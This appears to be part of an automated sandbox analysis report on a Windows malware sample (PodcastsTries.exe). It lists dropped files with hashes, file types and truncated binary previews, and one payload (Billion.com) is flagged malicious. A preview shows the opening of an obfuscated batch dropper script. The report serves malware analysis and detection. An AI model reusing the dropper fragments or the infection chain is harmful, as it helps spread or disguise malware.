                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\3a15802b-e075-4451-9d32-a5f34901432c.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):31335
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                        MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                        SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                        SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                        SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\680662\Billion.com

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):947288
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                                        MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                        SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                                        SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                                        SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                                                                        • Filename: vce exam simulator 2.2.1 crackk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                        • Filename: LVDdWBGnVE.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                        • Filename: eMBO6wS1b5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                        • Filename: AxoPac.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                        • Filename: fkawMJ7FH8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                        • Filename: ChoForgot.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                        • Filename: 94e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\680662\T

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):290032
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999416220046246
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:6144:sajmRZV4EL9dPQqNI9gtu2/uZJ3LovsfBwB9WLKqh/jnT/cO4Npsy:saSrBhVrSeuZ96B8L//jT16pP
                                                                                                                                                                                                                                                                                                        MD5:AEE70D72706E4448CD9BB63916C2FB70
                                                                                                                                                                                                                                                                                                        SHA1:B1B973D61B3E8FB6E8C15A5096F3189307D436C9
                                                                                                                                                                                                                                                                                                        SHA-256:6FEF118AE00BC96CD5D4E47C831A683342BD838C2CDE5CA6A70C907A88F25E0F
                                                                                                                                                                                                                                                                                                        SHA-512:E74F1BCD95823A94A80F90624B98C57F1AC6D5CA7FE2F1FA2E62936882C66B19E804C5B93F040B15BEB82A0A8C8DE6125C7A4201838127B0A475778121CCB8DF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:z.....(....O..bk.Gm..1.k8B.s.8....u.B<.I#....9T.. .N....;+....eJ.m..(DT$...(V.....Yi....H..r.n..m..r..............|.......Rl>..v.....o12.*6B...Z..#....^...K..]..-..f53.tt.._..w..[e"...O..W...W.Q...RmW&..<..z.$.....e.....v.\...O.&..P..A.#x..0....Ja..cK.Rdw.jW..s.@...s|.T.+..F'.`..}.b..=...r.......t.G.5i ..e0_n..........G.xO.Up.....u...=.wj<.{...SC.Wf...k...N...(."....w....6.x....]r..<..h...p.F..v..8.;E...ciH...=..8......."..eG.%on7.>@...a].u..8TB...!a.<5.sP.I ..[..`.?.l{.%.k..#q:!.M....h3.~...[a..u.......8..........Uf...g..F.W.r.O]"../..0x#.;...M`4 ....~..)c.M.V.v.\._6...+..M...R..`.rOX&...q_J.:.O.z.N$.R...gl....^...L8/~H.........{..9..a....v_}..2..-.......n|.#.P/.k...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....N.M.'.F...h.............zU..~"..zU..~"..kC.R......%x.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8dc9743a-a485-4b57-9859-963b35b80e01.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):58019
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.6197203554676864
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:LLuEibeJ78pJujohmmj4hHIcrhtz/M7tbwxdD:LvB8KUhmmj4hHIcrTz/M7tbwH
                                                                                                                                                                                                                                                                                                        MD5:3D9FF6640155C5D3586DE86380D909E5
                                                                                                                                                                                                                                                                                                        SHA1:DA7C549B991B7821586CC8BFFECC43E41345249E
                                                                                                                                                                                                                                                                                                        SHA-256:C0311FA6069F90B01CEC980016EF59E8821310479F78AA6DE2F54D2C8E247A51
                                                                                                                                                                                                                                                                                                        SHA-512:B29DCE58A28C69BD17779FAB337C4561EE25412378C1E0A911CD805F0F5DA10DA5C5CBC67D0EB56A1C71845DB09821DCE3DF00A2FEF914951F8ADC69E746101C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR...2...2......?......gAMA......a.....pHYs...........k.....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>..<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:tiff="http://ns.adobe.com/tiff/1.0/"><tiff:Orientation>1</tiff:Orientation></rdf:Description></rdf:RDF></x:xmpmeta>..<?xpacket end='w'?>,.......IDAThC.Io#Iz.....L&W.Z(j.*U..l_.Kl.a``......0.1...G.?a.d.in...x..J..E...L.1.Lj+..U.....Tf,o..E|oD......-.]S.-Tb.a..A...M.;..M.ea..!.X.n......?..<0....4IU.$......h..fh.8M. <..#f?../.J.U.(W.........aq?.....T.q....N4w.b.7?....84[{-v..R..... .Cd-Rw....o{.....K"q....!\^.v/..`........;;O..'..sA....`..D.V..". .......\.D...( .`>......N...e[L..O....=2.>}...}..P....#".....,...w.w.H>"A..>t.Q....O._....M.........R.5....oO........$.......^.gm..X6XV.<.}!H4.z.m...PJ}...F.XNM.P.i6+|.U...8..B|? .#.4}...#M

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\989b9e3e-ccbe-4895-98f5-cb58fc2011b3.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Alarm

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):135168
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.374941670188573
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:lZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf3:lK5vPeDkjGgQaE/loUDtf3
                                                                                                                                                                                                                                                                                                        MD5:13A2635497F70D3D361CB002E767D98F
                                                                                                                                                                                                                                                                                                        SHA1:1E87E1A3DCE0F80F70F6CB94F0825C7A6A707325
                                                                                                                                                                                                                                                                                                        SHA-256:733D061AAFB568C70DF42CB730FD2077192AE87386D0A15CC029616F4E3BDC55
                                                                                                                                                                                                                                                                                                        SHA-512:27D9F84646B7BA6AC5C3323339B6CFC3A5798E01A9EA69DE0D0048B1B06562DE27A6E85568B26BDB059EF5C1BDC8AB287152B5B8355872A0AC90D1C2521654B5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:..........text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Ana

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):83537
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.953672774821504
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:gWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:gWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                                                        MD5:E1172435D03594F9679FE60A14E30199
                                                                                                                                                                                                                                                                                                        SHA1:20029DE30935943707446474F606DDE5F4CC49C7
                                                                                                                                                                                                                                                                                                        SHA-256:B4C00D09A27D96BF3F0963C09299A6C3B5839C151D2E49291299A749C189B95A
                                                                                                                                                                                                                                                                                                        SHA-512:EBFF9CE05EB9CC7BAB03FFCDF8F6F44B5DF83849E53A93EF5F6843EDA2BC1A38E651DFDBE14D1D9103B06FB77857B08958145C62413AD9CCACB96EA652C68961
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:..............................................?.......................................................................................................................................................................................................................................................?..................................................................(... ...@.......................................................................................................................!..............!..............""3"...........3SbCS3!.......!#W33b3S"......!.C3SbSc3b!......&$3c34533b.!....3353Sb$6SS!....%6Sc3C3c3361! .!#3356#C53CCR....6""#""!""..b! ..52..2....!#3!...C5..5.....3S!!..bC"..232..C6!...2C2..C5!.#$52...6$3!!$3.!3c3!...S35!.#A!.S3V"...3bCa!.!.#6$3!.."CS2C!!!!C53$!!..366#1...$3cb...!$3S53..#c3S3.....C$6#!.356#Q.....3c3533Sc34!!....$3S6$32CSb.......C633Sc2C!.......#CS635c2.......!.#453C2!........!."33"..!.............!!..........!!!!.....................................?.......

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Assessing

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PodcastsTries.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):8867
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.14824535706454
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:0OKaxyR9ETk9HMsLAbXBRgYS2M5s28RPTl7:qaTY9kxMi28RPTd
                                                                                                                                                                                                                                                                                                        MD5:1A3D71246D4EFCA4AA005E013B7680CF
                                                                                                                                                                                                                                                                                                        SHA1:A171887269F1F331EBA1EB0084F3D5526AA89A52
                                                                                                                                                                                                                                                                                                        SHA-256:CA033EF4C6BAE09E2B6492B881454409C962B89E1B5E7B8A59914EAA72DAEC45
                                                                                                                                                                                                                                                                                                        SHA-512:D413B8F9891A95B8483AD10EE7E20317DB2D286B3806FCB407F9E1C592CD67E411D78F82B3EFC8FD875A66276CF6C5D405425B3D7897AE59AE1C34E6EA88E052
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:Set Biz=k..COTJFarming-Disorders-Directed-Habitat-Fundraising-..dFDocumented-Upgrade-Preference-..FoSnapshot-Escorts-April-Knock-Flag-..oCJEngland-Extent-Helping-Geographic-..JqnOTransexual-Hugh-Security-Numbers-Presentation-Stem-Earnings-Sensors-..DzJInjured-Raised-Integral-Sized-Compliance-Casting-Revealed-..KLProduction-Worried-Compilation-Travelers-Jade-Discs-Playback-Singles-Spain-..FxIllness-Shade-Later-Efforts-Front-..urGHPhillips-Fastest-Stud-Soon-Fabrics-Again-Revolution-Countries-Purchase-..VKIaEvident-Thermal-Membrane-..Set Obtained=u..GaPromises-Chick-Antigua-Gods-..RYygTransformation-Accredited-Readily-Col-..zRSharp-Reg-Organic-Ghz-Specifications-January-Enhance-Initiatives-Cap-..RywSusan-..fpXKaren-Expect-..YBColorado-Isaac-Searches-Ecology-Re-Premiere-Treaty-..QGExcellence-Exchange-Min-Become-Invoice-Promote-Excess-Dns-..cSAutomobile-Survivor-..vJJudges-Incorporated-Penis-Subtle-..Set Mentor=v..fKUrDisturbed-Withdrawal-Rugby-Grades-Nipple-..cJTravis-La-By-Textbooks-Water

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Assessing.cmd (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):8867
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.14824535706454
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:0OKaxyR9ETk9HMsLAbXBRgYS2M5s28RPTl7:qaTY9kxMi28RPTd
                                                                                                                                                                                                                                                                                                        MD5:1A3D71246D4EFCA4AA005E013B7680CF
                                                                                                                                                                                                                                                                                                        SHA1:A171887269F1F331EBA1EB0084F3D5526AA89A52
                                                                                                                                                                                                                                                                                                        SHA-256:CA033EF4C6BAE09E2B6492B881454409C962B89E1B5E7B8A59914EAA72DAEC45
                                                                                                                                                                                                                                                                                                        SHA-512:D413B8F9891A95B8483AD10EE7E20317DB2D286B3806FCB407F9E1C592CD67E411D78F82B3EFC8FD875A66276CF6C5D405425B3D7897AE59AE1C34E6EA88E052
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:Set Biz=k..COTJFarming-Disorders-Directed-Habitat-Fundraising-..dFDocumented-Upgrade-Preference-..FoSnapshot-Escorts-April-Knock-Flag-..oCJEngland-Extent-Helping-Geographic-..JqnOTransexual-Hugh-Security-Numbers-Presentation-Stem-Earnings-Sensors-..DzJInjured-Raised-Integral-Sized-Compliance-Casting-Revealed-..KLProduction-Worried-Compilation-Travelers-Jade-Discs-Playback-Singles-Spain-..FxIllness-Shade-Later-Efforts-Front-..urGHPhillips-Fastest-Stud-Soon-Fabrics-Again-Revolution-Countries-Purchase-..VKIaEvident-Thermal-Membrane-..Set Obtained=u..GaPromises-Chick-Antigua-Gods-..RYygTransformation-Accredited-Readily-Col-..zRSharp-Reg-Organic-Ghz-Specifications-January-Enhance-Initiatives-Cap-..RywSusan-..fpXKaren-Expect-..YBColorado-Isaac-Searches-Ecology-Re-Premiere-Treaty-..QGExcellence-Exchange-Min-Become-Invoice-Promote-Excess-Dns-..cSAutomobile-Survivor-..vJJudges-Incorporated-Penis-Subtle-..Set Mentor=v..fKUrDisturbed-Withdrawal-Rugby-Grades-Nipple-..cJTravis-La-By-Textbooks-Water

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Biotechnology

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PodcastsTries.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.997172003734787
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:lhTOlfrQmHWnm1//bzrkqNIznRxyFVR2rz2bhlr7:lqrQSW+PQqNI9xyzRu2/X
                                                                                                                                                                                                                                                                                                        MD5:F0CF3A7260C8D6F7FED49ED8A8E2DB62
                                                                                                                                                                                                                                                                                                        SHA1:A526B2247D3CA5E94327F0E790A8B1C402604D15
                                                                                                                                                                                                                                                                                                        SHA-256:31C1246A4CFB9667F9C36CEAC2B5060DC12EB871215A2452FFBA709C783122BC
                                                                                                                                                                                                                                                                                                        SHA-512:DCA64511B80D3C1D508B9A22BF92E8F07B209B867C55343E095423D59A90CA0A5A36FCDCD98C300E997850B64BEC8046BE1E8E150CA47809C951E1C0C032C5D4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.^^....(..lY..vZ.f....%9Mj..>9.8..h:.z..,.z.../....5.p{C$.Y..:Y..........S(....C......Q*Bs.....q%$..y6.....9..8......v.o. zz..T.s.:.VD.0.9. ...@:l....0..!...%.W.2VO..".?. .u..(`...nb{-g..P.....@..`e.%...g.,>..|J.....i.t.K..i.v.....J.L...}.. ...d.............c.:..U.....WwH..h..O..;...-7/?..j.<.h......#Y.... ..q...2.Dt.S.......J?Ca..{%....&.m...o...Q_...I.....I..d..L..x3..Uh(|g.S-..:-.?...R.R..(.3,.U...s..2...c...Q`<~\..0.M\.<.B,|....2..:.5..m..KE..(Q.@....n.T.lf...L.l..7..y.....\CZ/S.( ...SWp......+.2.*/..%.[...Xs.V}.8..Q;.10....Ab.].5......t.9.b.Y..E.k..e.{...4.e7......;c/...0.o.`j.......,.w....a..T....@..M.V....s.l?.^...$...+...t....u.';...-.|..]T.J.b..c*f6..(N...G..._.N....,......FCvv.....(eJ%.....!..Y..4..+......01...Z=j.}...)x......J.=_:.....I.F....jBVsC./.yG.~+....-.I..I.bz<...;i=W?.A.@.......mE..^b..<..3.#.n.y ..(......hW..V...}V..b..3........N<.3..j...\Z..2.#.T^?vg...i{?..#..4..?..+..A.L...YN9..-.)H..~...(...D6...D~

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Compensation

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):528
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.415418578441008
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:PqjvVg3F+X32+hZCt7HSbYwClS6CSNEcixN3Qdp94sA4PvMt/66h1I2YgJ62/:PyGSG+fCtJfjEvadTfA43k66h1ICd
                                                                                                                                                                                                                                                                                                        MD5:8E1BFD84ABBD93E396B7EB834370563F
                                                                                                                                                                                                                                                                                                        SHA1:3F08086EB5C5C56202606CF98F3337C39C4FCA63
                                                                                                                                                                                                                                                                                                        SHA-256:8A91EE541DB819325E37068DB7EC112D6713F1BDBBFB6599CC5F93409AAFA8AF
                                                                                                                                                                                                                                                                                                        SHA-512:ADD592639AE154DD30E3BD10149DEF542E15ED1644AFE0228AF2488E7AA0233ADCD06AAAE48E92741C383B23B8026D1C8BE2B32687E65E07BD99B262296F07A8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:OBTAINING........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@..................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Enzyme

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PodcastsTries.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):91136
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.997933837358192
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:STZwpf/aMb4exsNx7ySKhZB7F0QQ/MjDABLcB9w6Tsxe8NoVsYszPb+qb:2WiZJ3Lov7xQ/WcBwB9feqqKqb
                                                                                                                                                                                                                                                                                                        MD5:E55E49C9C9654822EBCF66F646AA1807
                                                                                                                                                                                                                                                                                                        SHA1:B43D0B12490073E8006C41019311C2BCE71FAF3A
                                                                                                                                                                                                                                                                                                        SHA-256:E3E47C5AF4DF600B306067EA0FB0EDBDE366DA0ADAFBC4846259F0B8E193C868
                                                                                                                                                                                                                                                                                                        SHA-512:33E308D477BD5D99905CBC6DFF527C360DD87A85D9854E992CB7779E27F4278C0CFE72CBD1068FE256CCB628F40E4C8918BB5199BAEA24408920CEA3F6113A10
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.<}.%O.~.B;[.E.c~,%|.M.`8...s.Yl^......C.Vxjc......$..L...2..;.V.=!....#.6'6..h?%E.r..D...-..#.q_+.......5j.O.....=Y.1....l(r.!.%4%~.Q..}'.6g....5KY.49...(.%.tTp.g$f...|.=:=}T35}.D..Q.W.9.5......x_#...a*......L~5w.}U......n..g.2..=...,.J.&s.f..b.k2.L....U......&.E..u....%...8.[*d.....S...0w11./8.T.Wy^..:..........+.0PD).$..P.A.......\.A&.V.@U....p......!j`...b.D*..pXQ.G.s...c.UA..#y...N.$.......j.[....8...~..#..[..n......C>.8E.;...].+qT.........4.g.1..gl..^l.'*.#3h{...j.T..iG+M......2..\....o..b..5) <:....is2.|FY............<E>....a>......%.)..Ab.....\..+.1.F.........sB.K..b..Xrs..9.P(\...H0.G...2Z....q...g=.M.62.7Q}jh4.xp.{{@.+..*..WF.[...i.......4.4uu... AD9&.L...P.:.....K.$T..Q.;vv...#.....B...k..*...v.... ...q~.Y.4..c..e$b.....PC].No.}B0....c.N.=.....8M].Y.l......4&g..SS........<}s..<.............3....|XS.....#49...S....L....,z._W..B<.D...Fo ..pw....@..de...'p.IR..D...}.....:.....P.D..yP...pO..o./(z.#Z.!].......;.......XH.9..g.....

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Harvard

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PodcastsTries.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):71920
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.997600682711841
